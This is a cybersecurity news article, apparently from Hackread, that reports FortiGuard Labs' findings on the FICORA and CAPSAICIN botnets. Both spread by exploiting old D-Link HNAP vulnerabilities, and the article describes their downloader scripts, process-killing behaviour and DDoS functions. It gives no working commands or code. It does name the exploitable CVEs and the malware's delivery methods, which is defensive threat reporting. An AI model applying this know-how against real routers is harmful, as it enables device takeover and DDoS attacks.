FICORA, CAPSAICIN Botnets Exploit Old D-Link Router Flaws for DDoS Attacks

****In This Article, You Will Read About:****

• Increased Botnet Activity: Surge in the activity of new “FICORA” and “CAPSAICIN” botnets, variants of Mirai and Kaiten.

• Exploited Vulnerabilities: Attackers exploit known D-Link router vulnerabilities (e.g., CVE-2015-2051, CVE-2024-33112) to execute malicious commands.

• Botnet Capabilities: Both botnets use shell scripts, target Linux systems, kill malware processes, and conduct DDoS attacks.

• Global Impact: FICORA targeted multiple countries, while CAPSAICIN focused on East Asia, which had intense activity for over two days.

• Mitigation Measures: Regular firmware updates and robust network monitoring are recommended to prevent exploitation.

FortiGuard Labs has observed a surge in the activity of two botnets, “FICORA” and “CAPSAICIN,” in October and November 2024. In its blog post, shared exclusively with Hackread.com, FortiGuard Labs’ Threat Research team explained that these botnets are variants of the well-known Mirai and Kaiten botnets and can execute malicious commands.

Further probing revealed that the distribution of these botnets involves exploiting D-Link vulnerabilities that allow remote attackers to execute malicious commands via a GetDeviceSettings action on the Home Network Administration Protocol (HNAP) interface.

These vulnerabilities include CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112. These CVEs represent specific instances of vulnerabilities within D-Link routers that attackers have exploited. They often involve flaws in how HNAP handles user input and authentication. Attackers use the HNAP interface to deliver the malware, and this weakness was first exposed almost a decade ago.

The affected platforms include D-Link DIR-645 Wired/Wireless Router Rev. Ax, D-Link DIR-806 devices, and D-Link GO-RT-AC750 GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02. According to FortiGuard Labs IPS telemetry, the botnets have a high severity level and are spread through older attacks.

The FICORA botnet is malicious software that targets multiple Linux architectures and encodes its configuration using the ChaCha20 encryption algorithm. Furthermore, its functionalities also include a brute force attack feature, embedding a shell script with hexadecimal ASCII characters to identify and kill other malware processes, and DDoS attack functionalities using protocols like UDP, TCP, and DNS.

This botnet, according to to FortiGuard Labs Threat Research team’s blog post, downloads a shell script named ‘multi’ that uses various methods including wget, ftpget, curl, and tftp to download the actual malware.

Downloader script “multi” using the “curl” command (Via FortiGuard Labs)

The FICORA botnet attack, which targeted many countries worldwide, was triggered by attackers from Netherlands servers. On the other hand, the CAPSAICIN attack, unlike FICORA, was only intensely active over two days between October 21 and 22, 2024, and targeted East Asian countries.

However, like FICORA it also exhibits diverse functionalities, including downloading a shell script called ‘bins.sh’, targeting multiple Linux architectures, killing known botnet processes, establishing a connection with its C2 server, sending victim host information, and offering DDoS attack functions.

Although the vulnerabilities exploited in this attack have been known for almost a decade, these attacks are still prevalent, which is concerning. Nevertheless, to reduce the risk of D-Link devices being compromised by botnets, it is recommended to regularly update firmware and maintain comprehensive network monitoring.

“FortiGuard Labs discovered that “FICORA” and “CAPSAICIN” spread through this weakness. Because of this, it is crucial for every enterprise to regularly update the kernel of their devices and maintain comprehensive monitoring,” FortiGuard Lab’s researcher Vincent Li concluded.

1. Mirai-Inspired Gorilla Botnet Hits 0.3m Targets in 100 Countries
2. OracleIV DDoS Botnet Malware Hits Docker Engine API Instances
3. Androxgh0st Botnet Hits IoT Devices, Exploiting 27 Vulnerabilities
4. ‘Matrix’ Hackers Deploy Massive New IoT Botnet for DDoS Attacks
5. Golang Botnet “Zergeca” Discovered, Delivers Brutal DDoS Attacks